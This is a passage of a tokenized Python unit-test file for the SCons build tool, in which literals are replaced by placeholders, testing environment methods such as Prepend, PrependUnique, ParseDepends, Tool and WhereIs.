ParseConfig ( "<STR_LIT>" , unique = <NUM_LIT:0> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:bar>' , '<STR_LIT:bar>' ] , env [ '<STR_LIT>' ] <EOL> finally : <EOL> env . backtick = orig_backtick <EOL> def test_ParseDepends ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( SINGLE = test . workpath ( '<STR_LIT>' ) ) <EOL> tlist = [ ] <EOL> dlist = [ ] <EOL> def my_depends ( target , dependency , tlist = tlist , dlist = dlist ) : <EOL> tlist . extend ( target ) <EOL> dlist . extend ( dependency ) <EOL> env . Depends = my_depends <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) ) <EOL> exc_caught = None <EOL> try : <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) , must_exist = <NUM_LIT:1> ) <EOL> except IOError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> del tlist [ : ] <EOL> del dlist [ : ] <EOL> env . ParseDepends ( '<STR_LIT>' , only_one = <NUM_LIT:1> ) <EOL> t = map ( str , tlist ) <EOL> d = map ( str , dlist ) <EOL> assert t == [ '<STR_LIT>' ] , t <EOL> assert d == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d <EOL> del tlist [ : ] <EOL> del dlist [ : ] <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) ) <EOL> t = map ( str , tlist ) <EOL> d = map ( str , dlist ) <EOL> assert t == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , t <EOL> assert d == [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT:abc>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d <EOL> exc_caught = None <EOL> try : <EOL> env . ParseDepends ( test . workpath ( '<STR_LIT>' ) , only_one = <NUM_LIT:1> ) <EOL> except SCons . Errors . 
UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> def test_Platform ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( WIN32 = '<STR_LIT:win32>' , NONE = '<STR_LIT>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . Platform ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> exc_caught = None <EOL> try : <EOL> env . Platform ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> env . Platform ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env . Platform ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_Prepend ( self ) : <EOL> """<STR_LIT>""" <EOL> import UserDict <EOL> UD = UserDict . UserDict <EOL> import UserList <EOL> UL = UserList . UserList <EOL> cases = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT:a>' , '<STR_LIT:3>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT:a>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , 
'<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT:I>' , '<STR_LIT:1>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , [ '<STR_LIT>' ] , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UL ( [ '<STR_LIT>' ] ) , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , '<STR_LIT>' , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , [ '<STR_LIT>' ] , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UL ( [ '<STR_LIT>' ] ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : 
<NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ ] , <EOL> [ ] , [ ] , [ ] , <EOL> [ ] , UL ( [ ] ) , UL ( [ ] ) , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT:O>' , '<STR_LIT:1>' ] ) , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ ] , UL ( [ ] ) , <EOL> UL ( [ ] ) , UL ( [ ] ) , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ 
'<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ] <EOL> env = Environment ( ) <EOL> failed = <NUM_LIT:0> <EOL> while cases : <EOL> input , prepend , expect = cases [ : <NUM_LIT:3> ] <EOL> env [ '<STR_LIT>' ] = copy . copy ( input ) <EOL> try : <EOL> env . Prepend ( XXX = prepend ) <EOL> except Exception , e : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( prepend ) , e ) <EOL> failed = failed + <NUM_LIT:1> <EOL> else : <EOL> result = env [ '<STR_LIT>' ] <EOL> if result != expect : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( prepend ) , repr ( result ) , repr ( expect ) ) <EOL> failed = failed + <NUM_LIT:1> <EOL> del cases [ : <NUM_LIT:3> ] <EOL> assert failed == <NUM_LIT:0> , "<STR_LIT>" % failed <EOL> env [ '<STR_LIT>' ] = UL ( [ '<STR_LIT:foo>' ] ) <EOL> env . Prepend ( UL = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , UL ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:r>' , '<STR_LIT:foo>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:foo>' ] ) <EOL> env . Prepend ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' , '<STR_LIT:foo>' ] , result <EOL> env3 = self . TestEnvironment ( X = { '<STR_LIT>' : <NUM_LIT:7> } ) <EOL> env3 . 
Prepend ( X = { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , Y = { '<STR_LIT>' : <NUM_LIT:10> } ) <EOL> assert env3 [ '<STR_LIT:X>' ] == { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , env3 [ '<STR_LIT:X>' ] <EOL> assert env3 [ '<STR_LIT:Y>' ] == { '<STR_LIT>' : <NUM_LIT:10> } , env3 [ '<STR_LIT:Y>' ] <EOL> env4 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:11> } ) <EOL> env4 . Prepend ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:12> } ) <EOL> assert env4 [ '<STR_LIT>' ] == { '<STR_LIT>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:12> } , env4 [ '<STR_LIT>' ] <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> def test_PrependENVPath ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( ENV = { '<STR_LIT>' : r'<STR_LIT>' } , <EOL> MYENV = { '<STR_LIT>' : r'<STR_LIT>' } ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' , delete_existing = <NUM_LIT:0> ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> p = env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> env1 . PrependENVPath ( '<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , env1 . fs . 
Dir ( '<STR_LIT>' ) , sep = '<STR_LIT:;>' ) <EOL> assert env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' + p , env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def test_PrependUnique ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = '<STR_LIT>' , <EOL> AAA3 = '<STR_LIT>' , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = '<STR_LIT>' , <EOL> BBB1 = [ '<STR_LIT>' ] , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' ] , <EOL> BBB4 = [ '<STR_LIT>' ] , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = '<STR_LIT>' , <EOL> DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> env . PrependUnique ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = [ '<STR_LIT>' ] , <EOL> AAA3 = [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:b>' , '<STR_LIT>' ] , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = [ '<STR_LIT>' ] , <EOL> BBB1 = '<STR_LIT>' , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT>' ] , <EOL> BBB4 = '<STR_LIT>' , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = [ '<STR_LIT>' ] , <EOL> DDD1 = '<STR_LIT:b>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:c>' , '<STR_LIT:b>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ 
'<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> env . PrependUnique ( DDD1 = '<STR_LIT:b>' , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> env . PrependUnique ( DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:c>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env . PrependUnique ( DDD1 = [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:d>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env [ '<STR_LIT>' ] = CLVar ( [ ] ) <EOL> env . PrependUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:1>' or sys . version [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> assert result == '<STR_LIT:bar>' , result <EOL> else : <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:abc>' ] ) <EOL> env . PrependUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' , '<STR_LIT:abc>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:bar>' ] ) <EOL> env . PrependUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> def test_Replace ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . 
TestEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> env1 . Replace ( BBB = '<STR_LIT>' , CCC = '<STR_LIT>' ) <EOL> env2 = self . TestEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT>' , CCC = '<STR_LIT>' ) <EOL> assert env1 == env2 , diff_env ( env1 , env2 ) <EOL> env3 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> assert hasattr ( env3 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> env3 . Replace ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:2> } ) <EOL> assert not hasattr ( env3 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert hasattr ( env3 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> def test_ReplaceIxes ( self ) : <EOL> "<STR_LIT>" <EOL> env = self . TestEnvironment ( LIBPREFIX = '<STR_LIT>' , <EOL> LIBSUFFIX = '<STR_LIT>' , <EOL> SHLIBPREFIX = '<STR_LIT>' , <EOL> SHLIBSUFFIX = '<STR_LIT>' , <EOL> PREFIX = '<STR_LIT>' , <EOL> SUFFIX = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' == env . ReplaceIxes ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) == env . ReplaceIxes ( os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert '<STR_LIT>' == env . ReplaceIxes ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_SetDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( tools = [ ] ) <EOL> env . SetDefault ( V1 = <NUM_LIT:1> ) <EOL> env . SetDefault ( V1 = <NUM_LIT:2> ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> <EOL> env [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> env . SetDefault ( V2 = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:2> <EOL> def test_Tool ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( LINK = '<STR_LIT>' , NONE = '<STR_LIT>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . Tool ( '<STR_LIT>' ) <EOL> except SCons . Errors . 
EnvironmentError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> exc_caught = None <EOL> try : <EOL> env . Tool ( '<STR_LIT>' ) <EOL> except SCons . Errors . EnvironmentError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> env . Tool ( '<STR_LIT>' , toolpath = [ '<STR_LIT>' ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env . Tool ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( tools = [ '<STR_LIT>' ] , toolpath = [ test . workpath ( '<STR_LIT>' ) ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env . Tool ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_WhereIs ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> sub1_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub2_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub3_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub4_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if sys . platform != '<STR_LIT:win32>' : <EOL> test . write ( sub1_xxx_exe , "<STR_LIT:\n>" ) <EOL> os . mkdir ( sub2_xxx_exe ) <EOL> test . write ( sub3_xxx_exe , "<STR_LIT:\n>" ) <EOL> os . chmod ( sub3_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> test . write ( sub4_xxx_exe , "<STR_LIT:\n>" ) <EOL> os . chmod ( sub4_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> env_path = os . environ [ '<STR_LIT>' ] <EOL> pathdirs_1234 = [ test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . 
workpath ( '<STR_LIT>' ) , <EOL> ] + string . split ( env_path , os . pathsep ) <EOL> pathdirs_1243 = [ test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> ] + string . split ( env_path , os . pathsep ) <EOL> path = string . join ( pathdirs_1234 , os . pathsep ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : path } ) <EOL> wi = env . WhereIs ( '<STR_LIT>' ) <EOL> assert wi == test . workpath ( sub3_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathdirs_1243 ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , string . join ( pathdirs_1243 , os . pathsep ) ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , reject = sub3_xxx_exe ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathdirs_1243 , reject = sub3_xxx_exe ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> path = string . join ( pathdirs_1243 , os . pathsep ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : path } ) <EOL> wi = env . WhereIs ( '<STR_LIT>' ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathdirs_1234 ) <EOL> assert wi == test . workpath ( sub3_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , string . join ( pathdirs_1234 , os . pathsep ) ) <EOL> assert wi == test . workpath ( sub3_xxx_exe ) , wi <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathext = '<STR_LIT>' ) <EOL> assert wi is None , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathext = '<STR_LIT>' ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , path = pathdirs_1234 , pathext = '<STR_LIT>' ) <EOL> assert string . lower ( wi ) 